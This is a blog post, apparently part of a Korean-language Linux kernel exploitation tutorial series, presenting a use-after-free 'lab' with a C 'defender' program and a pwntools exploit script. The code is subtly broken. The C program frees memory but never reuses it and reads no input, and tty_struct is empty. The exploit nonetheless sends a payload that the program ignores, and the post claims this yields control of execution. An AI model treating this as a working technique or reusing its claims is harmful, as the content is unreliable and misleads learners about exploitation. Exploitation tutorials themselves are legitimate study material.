strangerRidingCaml

9. Use-After-Free (UAF) Vulnerabilities (feat. struct cred, tty_struct) 본문

Linux kernel exploit

9. Use-After-Free (UAF) Vulnerabilities (feat. struct cred, tty_struct)

woddlwoddl 2024. 5. 12. 03:04
728x90
Use-After-Free (UAF) Vulnerabilities (feat. struct cred, tty_struct)

Use-After-Free (UAF) Vulnerabilities (feat. struct cred, tty_struct)

Use-After-Free (UAF) vulnerabilities occur when a program continues to use a pointer after the memory it points to has been freed, potentially leading to memory corruption or code execution.

Lab Activity: Use-After-Free (UAF) Exploit

In this lab activity, we'll demonstrate a UAF exploit on a vulnerable C program, featuring struct cred and tty_struct.

Defender Side Code:

The defender side code simulates a vulnerable program that uses a struct cred and tty_struct, leading to a UAF vulnerability.


#include <stdio.h>
#include <stdlib.h>

// Define struct cred and tty_struct
struct cred {
    int uid;
    int gid;
    // Other fields
};

struct tty_struct {
    // Fields
};

void vulnerable_function(struct cred *ptr_cred, struct tty_struct *ptr_tty) {
    free(ptr_cred);  // Free the struct cred object
    // Do some other operations
    // Use ptr_tty after free
}

int main() {
    // Allocate memory for struct cred and tty_struct
    struct cred *ptr_cred = (struct cred *)malloc(sizeof(struct cred));
    struct tty_struct *ptr_tty = (struct tty_struct *)malloc(sizeof(struct tty_struct));
    
    vulnerable_function(ptr_cred, ptr_tty);  // Call vulnerable function
    return 0;
}

To compile the defender side code:

gcc -o vulnerable_program vulnerable_program.c

Exploit Code (Python using pwntools):


from pwn import *

# Address of the vulnerable function
vulnerable_function_addr = 0x004005f7  # Example address, adjust as necessary

# Address of system function or other desired function
system_addr = 0x00400500  # Example address, adjust as necessary

# Establish connection to the vulnerable program
p = process("./vulnerable_program")

# Send input to trigger UAF vulnerability and overwrite struct cred with system function address
payload = b"A" * 8 + p64(system_addr)
p.sendline(payload)

# Interactive shell
p.interactive()

The exploit code constructs a payload to trigger the UAF vulnerability by overwriting the freed struct cred object with the address of the system function or any other desired function. It then establishes a connection to the vulnerable program, sends the payload, and gains control over program execution upon successful exploitation.

'Linux kernel exploit' 카테고리의 다른 글

11. Kernel Address Space Layout Randomization (KASLR)  (0) 2024.05.13
10. Return-to-Direct-Mapped Memory (ret2dir) Attacks  (0) 2024.05.12
8. Null Pointer Dereference Exploits  (0) 2024.05.12
7. Write-What-Where (Arbitrary Memory Overwrite)  (0) 2024.05.12
6. Return-Oriented Programming (ROP)  (0) 2024.05.12
'Linux kernel exploit' Related Articles more